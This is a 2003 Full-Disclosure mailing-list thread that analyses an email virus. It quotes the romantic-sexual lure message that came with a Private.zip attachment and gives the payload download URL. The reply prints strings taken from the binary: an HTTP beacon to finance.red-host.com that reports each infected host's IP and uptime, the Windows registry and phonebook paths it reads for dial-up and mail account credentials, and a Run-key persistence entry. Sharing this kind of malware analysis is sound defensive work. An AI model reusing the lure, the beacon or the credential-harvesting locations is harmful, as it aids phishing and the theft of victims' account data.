Hi, Look this line: GET /events.php?%s HTTP/1.1 Accept: */* Connection: Keep-Alive Host: finance.red-host.com id=%s&ip=%s&speed=%d&timeonline=%d finance.red-host.com so imagine this: id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection speed]&timeonline=[seconds/minutes]
this logs the information about an infected host. look more: /* Written By Adrey Karimov [www.proantivirus.com] */ This can be a bogus data but , that boy is from an antivirus related company ! :) ( who are the virii authors now ? ) %s0x%02hx%02hx%02hx%02hx%02hx%02hx S-%lu- %s SC:%s %s SW:%i.%i.%i.%i %s PW:%i.%i.%i.%i %s SD:%i.%i.%i.%i %s PD:%i.%i.%i.%i %s IP:%i.%i.%i.%i %s%s:%s:%s [%s] DialParamsUID %sMicrosoft\Network\Connections\pbk\rasphone.pbk %s\ LdapUnicodeToUTF8 Thsi calls the api of microsoft ras and insert the data into a new telefonic connection. This functions are called , so the virus uses the memeroy stack: strcat strchr <-* strcmp strlen strncat strncpy <- * strstr < - * And it creates a file with the first data : c:\temp35.txt It keeps there the data found at SOFTWARE\Microsoft\Internet Account Manager\Accounts Other things that the virus do: Software\Microsoft\Windows\CurrentVersion\Run \sysdeb32.exe 31337 c:\tmp.exe Creates a regkey to run it at startup and it copies to some locations. stores this data ?�? : %-2.2X %.8x%.8x \svc.sav I thin k some info is hardcoded . The presence of sysdeb32.exe and tmp.exe indicates virus activity. i don't know which virus is this. xD Best regards , ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->\x74\x72\x75\x6c\x75\x78 0x02->The truth is out there, 0x03-> outside your mind . __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** \x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68 http://www.nsrg-security.com ______________________ ----- Original Message ----- From: "Andrew Thomas" <[EMAIL PROTECTED]> To: "'Full Disclosure'" <[EMAIL PROTECTED]> Sent: Tuesday, November 25, 2003 9:02 AM Subject: [Full-Disclosure] New virus > Hi, > > Just to confirm receipt of another email containing the following > text: > --snip-- > Hello my dear Mary, > > I have been thinking about you all night. I would like to apologize > for the other night when we made beautiful love and did not use > condoms. I know this was a mistake and I beg you to forgive me. > > I miss you more than anything, please call me Mary, I need you. Do > you remember when we were having wild sex in my house? I remember > it all like it was only yesterday. You said that the pictures > would not come out good, but you were very wrong, they are great. > I didn't want to show you the pictures at first, but now I think > it's time for you to see them. Please look in the attachment and > you will see what I mean. > > I love you with all my heart, James. > --snip-- > > With attached Private.zip. > > A quick strings (after unpacking) on the file gives > http://afx.alink.co.za/rt.txt > > The original archive is available @ http://afx.alink.co.za/Private.zip > > I don't have the time to take this apart, but some interesting things > include a call to function "UrlDownloadToFileA", and a bunch of other > HTTP-style requests. > > Also looks like it may do some kind of speed test and post results > as well remotely, including IP address of the infected host, as well > as pulling stuff out like RAS info, pop3 info, etc. > > The host that appears to be called is "finance.red-host.com", with a > call made to the page "showinfo.php", which returns only > --snip-- > Error 0x7a2e: Invalid query, database search failed. > --snip-- > without anything appended. > > There's quite a bit more in here. > > A. > -- > Andrew G. Thomas > Hobbs & Associates Chartered Accountants (SA) > (o) +27-(0)21-683-0500 > (f) +27-(0)21-683-0577 > (m) +27-(0)83-318-4070 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
